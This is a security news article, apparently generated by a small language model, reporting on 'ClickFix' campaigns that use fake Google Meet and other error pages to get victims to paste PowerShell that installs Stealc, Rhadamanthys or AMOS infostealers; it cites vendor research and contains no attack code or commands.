Ethical Hacking News
Infostealing malware is on the rise, with fake Google Meet conference errors being used to deliver malicious payloads. ClickFix campaigns have become increasingly sophisticated, using phishing emails, fake Facebook pages, and deceptive GitHub issues to trick victims into downloading infostealing malware. Stay safe online by being aware of these risks and taking steps to protect yourself.
Malicious actors use fake Google Meet conference errors to deliver infostealing malware in "ClickFix" campaigns. The scams have evolved since May, using phishing emails, fake Facebook pages, and deceptive GitHub issues to trick victims into downloading malware. The threat actors impersonate legitimate services like Google Chrome, Microsoft Word, and OneDrive to gain trust. ClickFix campaigns have increased in frequency, targeting the US and Japan, with fake Google Meet pages being used as lures. The malware fetches its payload from 'googiedrivers.com', delivering infostealing malware like Stealc or Rhadamanthys for Windows, and AMOS Stealer for macOS.
Malicious actors are using fake Google Meet conference errors to deliver infostealing malware, a growing trend that has been dubbed "ClickFix" campaigns. These scams have evolved significantly since their emergence in May and now use various tactics such as phishing emails, fake Facebook pages, and deceptive GitHub issues to trick victims into downloading the malware.
The ClickFix campaigns were first reported by Proofpoint in May, where they discovered a threat actor (TA571) using social-engineering tactics to impersonate errors for Google Chrome, Microsoft Word, and OneDrive. The scam would prompt the victim to copy and paste a piece of PowerShell code that would fix the issue, but ultimately infect their computer with malware.
Since then, ClickFix campaigns have become more frequent, especially in the United States and Japan. In July, McAfee reported an increase in these campaigns, which now use fake Google Meet pages to lure victims into downloading the malware. The fake pages appear to be legitimate Google Meet links, complete with domain names that closely resemble actual Google Meet URLs.
The threat actors behind the ClickFix campaigns are using a variety of tactics to trick victims, including phishing emails and fake Facebook pages. They also use deceptive GitHub issues to create the illusion of a legitimate issue report. Once the victim clicks on the link or downloads the malware, it will run a piece of PowerShell code that will fetch the payload from the 'googiedrivers.com' domain.
The final payloads are infostealing malware such as Stealc or Rhadamanthys for Windows, and AMOS Stealer for macOS. These malware samples have been identified by Sekoia, a SaaS cybersecurity provider, which notes that the ClickFix campaigns have evolved significantly since their initial emergence.
In addition to Google Meet, ClickFix campaigns have also used other baits such as Zoom, PDF readers, fake video games, web3 browsers and projects, and messenger apps. This suggests that the threat actors are diversifying their tactics and using a variety of lures to trick victims into downloading the malware.
The ClickFix campaigns are just one example of the growing number of scams and cyber threats that are targeting individuals and businesses. As technology continues to evolve, it's essential for users to be aware of these risks and take steps to protect themselves.
Related Information:
https://www.bleepingcomputer.com/news/security/fake-google-meet-conference-errors-push-infostealing-malware/
https://any.run/malware-trends/rhadamanthys
https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/
https://thehackernews.com/2023/04/new-atomic-macos-stealer-can-steal-your.html
https://medium.com/@cyberhust1er/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219
Published: Thu Oct 17 17:07:40 2024 by llama3.2 3B Q4_K_M
